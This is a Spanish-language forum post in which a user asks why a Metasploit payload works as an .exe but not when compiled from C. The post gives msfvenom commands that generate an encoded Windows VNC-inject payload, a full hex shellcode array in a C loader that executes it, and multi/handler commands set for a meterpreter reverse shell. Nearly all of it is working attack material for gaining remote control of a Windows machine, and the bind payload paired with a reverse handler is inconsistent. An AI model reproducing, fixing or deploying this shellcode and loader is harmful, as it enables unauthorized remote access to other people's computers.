duda en metasploit

Iniciado por sigilo, 8 Agosto 2016, 17:51 PM

0 Miembros y 1 Visitante están viendo este tema.

sigilo

Espero me puedan ayudar con la siguiente duda en metasploit:

Al hacer esto:
msfvenom -a x86 --platform windows -p windows/vncinject/bind_tcp LHOST=192.168.56.1 LPORT=4441 -e x86/alpha_mixed -i 3 -f exe -o mixed.exe

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4441
msf exploit(handler) > set LHOST 192.168.56.1
msf exploit(handler) > exploit

Todo funciona de maravilla, pero si lo hago de esta forma no responde:

msfvenom -a x86 --platform windows -p windows/vncinject/bind_tcp LHOST=192.168.56.1 LPORT=4441 -e x86/alpha_mixed -i 3 -f c

char code[] =
"\xfc\xbb\x98\x27\x55\xdf\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x64\x9c\x9e\x3d\x73"
"\x87\xcb\xce\x25\x1e\x3d\xd1\x74\x9f\xfe\x68\x46\xd5\xf7\xb0"
"\xae\xf9\x07\xc9\xd1\x31\xa1\xf3\xd5\x41\x55\x1d\x28\x9f\x3a"
"\x1a\x21\xaf\x4a\x40\xec\x05\xb7\x94\x9c\x3b\xdf\xba\xea\xf1"
"\x09\x50\xa5\xa2\x82\x89\xd2\x6c\x1d\x41\x74\x12\x45\xea\x78"
"\x33\x2e\x67\x54\x12\x8e\x94\xeb\x8f\x7d\x90\x90\xcd\xf0\x37"
"\xed\x39\xd1\x1e\xe9\xfa\x68\xa8\xba\x2c\xa1\xd5\x46\xdb\x1b"
"\xa7\xf7\x24\x99\x0d\xc5\x9b\x3e\xd4\x70\xbd\xb9\xde\xfc\x6f"
"\x15\x80\x39\x5b\x9f\x1a\x0c\xf6\xd5\xb4\xe9\x71\x1b\x52\xb9"
"\x53\x7f\xfd\xd8\x77\x8f\x05\xfc\x05\x75\x81\x90\x42\xa2\x9f"
"\x84\x15\x72\x5e\x1c\x43\xb4\xc8\x37\xb5\x9a\x1f\x7c\xcf\x5b"
"\xd9\xbd\xbb\x23\x96\x7d\x93\x65\x58\x36\x70\x77\x68\x49\x28"
"\xf3\x37\xd4\x88\xad\x39\x07\x96\x2e\x56\xfa\x82\xb6\x9d\x0e"
"\x22\x26\xc1\x85\x48\x59\xc6\x67\x36\x41\xeb\xac\x86\x09\x4d"
"\x5a\xb4\x25\xe4\x5c\x8d\x1e\x89\xab\x5e\x17\xff\x86\x0d\xaa"
"\x97\x0c\xc3\x02\x61\x87\xfa\x30\xf0\xe6\x51\x04\x0a\xd4\xb9"
"\x5a\x82\x86\xbb\x8f\x1e\xb3\x16\xa8\xc6\xef\xd7\xed\xaa\xd2"
"\x21\x30\x84\xc4\xa7\xb8\x6a\x99\x1e\x32\xf2\xcc\x53\x01\xcd"
"\xec\xdc\xed\xb5\x0c\xee\x4b\xc8\x02\xdc\xc5\xba\xa4\x39\x2b"
"\xa0\x1d\xa8\x0c\xb3\xca\xef\x17\xb6\x9b\xa6\x2d\x83\x2c\xfd"
"\x2e\x1e\xa3\x33\x85\xa0\xf9\xc0\x87\xb0\x87\xe0\x1d\x9e\xde"
"\x50\x79\xad\xe9\x43\xd4\x1e\x2e\x6b\x52\x78\xc5\xeb\x78\x7e"
"\x55\x42\xa8\xf0\xb7\xcb\xa2\x0b\xfd\xbf\x01\xa0\x74\x38\x73"
"\xee\xb9\x32\x5b\xb8\x93\x37\xc0\x2f\x05\x07\x97\x13\x59\x07"
"\x47\xfd\xda\x87\xa8\x7a\xba\x95\xc6\xca\x15\x96\x27\x28\xff"
"\xb1\xc6\xdf\x81\xd4\x4c\x14\x56\xf7\x10\xfa\x0d\xc1\x19\xb4"
"\x66\x07\x29\x8b\x0a\xf2\x1e\x52\xbe\x29\x6b\x60\xa8\x07\xa7"
"\xae\x42\xa7\x38\x31\x6a\xa8\x38\x31"
;
int main()
{   
   int (*func)();
   func = (int (*)()) code;
   (int)(*func)();


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4441
msf exploit(handler) > set LHOST 192.168.56.1
msf exploit(handler) > exploit

lo compilo con dev-c++

PD: con la plantilla en C no tengo retorno del remoto,